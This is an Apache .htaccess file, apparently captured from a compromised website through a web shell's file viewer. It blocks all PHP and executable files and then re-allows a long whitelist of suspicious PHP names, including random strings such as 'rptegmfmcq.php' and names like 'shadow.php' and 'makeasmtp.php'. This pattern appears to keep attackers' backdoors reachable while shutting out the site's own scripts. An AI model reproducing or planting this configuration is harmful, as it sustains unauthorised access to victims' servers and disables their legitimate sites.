Current File : /home/u70102/domains/emfinance.com.pl/public_html/.htaccess
<FilesMatch '.(py|exe|php|PHP|Php|PHp|pHp|pHP|pHP7|PHP7|phP|PhP|php5|suspected)$'>
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch '^(index.php|wp-sign.php|wp-set.php|good.php|main.php|mall.php|buy.php|todo.php|shop.php|goods.php|savep.php|infos.php|lowpr.php|start.php|state.php|store.php|savep.php|amazon.php|pindex.php|online.php|sample.php|shadow.php|ticket.php|account.php|baindex.php|groupon.php|product.php|webhook.php|discount.php|makeasmtp.php|rptegmfmcq.php|pnnfxpueiq.php|wlkjfoqicr.php|loggertrait.php|recollection.php|edit.php|wb.php|x.php|admin.php|about.php|item.php|pass.php|fetch.php|sess.php|autoload_classmap.php|hex.php|wp-ann.php|hexa.php)$'>
Order allow,deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>